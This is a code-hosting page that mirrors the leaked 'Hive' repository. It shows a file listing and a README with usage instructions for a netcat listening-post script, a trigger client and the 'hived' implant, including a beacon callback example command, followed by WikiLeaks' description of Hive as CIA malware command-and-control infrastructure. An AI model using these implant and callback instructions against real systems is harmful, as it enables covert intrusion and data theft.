crash.software
Projects
Pull Requests
Issues
Builds
Vault-8-Hive
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY Vault-8-Hive Files
🤬
master
ROOT /
Enable build support by adding .buildspec.yml
client Loading last commit info...
common
documentation
honeycomb
ilm-client
infrastructure
server
snapshot_20141017-1409
snapshot_20141107-1345
snapshot_20141217-1052
.cproject
.project
Doxyfile
Makefile
README.md
README.md 

//*************************************************************************
nc.sh - scripted netcat listener to emulate listening post until LP is set up

  Usage: ./nc.sh


//*************************************************************************
hclient - hive client that works with Windows, Solaris, and Linux implant

  Usage:
  ./hclient-linux-dbg [-p port] 
  ./hclient-linux-dbg [-p port] [-t address] [-a address] [-P protocol] [-d delay] 

  Depending on options, client can send triggers, listen, or both
    [-p port]      - callback port
    [-t address]   - IP address of target
    [-a address]   - IP address of listener
    [-P protocol]  - trigger protocol
    [-d delay]     - (optional) delay between received trigger and callback
    [-h ]          - print this usage

  Examples:
   Coming soon!

//*************************************************************************
hived - hive implant

  Usage:
  ./hived-solaris-sparc-dbg  -a <ip address> -p <port> 

        -a - Beacon IP address to callback to
        -p - Beacon port
        -I - interface [required, only for Solaris, e.g. hme0, e1000g0]
        -d - Initial Beacon delay in milliseconds
        -i - Beacon interval in milliseconds
        -h - Print help

  Example:
  ./hived-solaris-sparc-dbg -a 10.3.2.76 -p 9999 -i 100000 -I hme0

From WikiLeaks:

Today, 9 November 2017, WikiLeaks publishes the source code and development logs to Hive, a major component of the CIA infrastructure to control its malware.

Hive solves a critical problem for the malware operators at the CIA. Even the most sophisticated malware implant on a target computer is useless if there is no way for it to communicate with its operators in a secure manner that does not draw attention. Using Hive even if an implant is discovered on a target computer, attributing it to the CIA is difficult by just looking at the communication of the malware with other servers on the internet. Hive provides a covert communications platform for a whole range of CIA malware to send exfiltrated information to CIA servers and to receive new instructions from operators at the CIA.

Hive can serve multiple operations using multiple implants on target computers. Each operation anonymously registers at least one cover domain (e.g. "perfectly-boring-looking-domain.com") for its own use. The server running the domain website is rented from commercial hosting providers as a VPS (virtual private server) and its software is customized according to CIA specifications. These servers are the public-facing side of the CIA back-end infrastructure and act as a relay for HTTP(S) traffic over a VPN connection to a "hidden" CIA server called 'Blot'. source: https://wikileaks.org/vault8/

Please wait...
Page is in error, reload to recover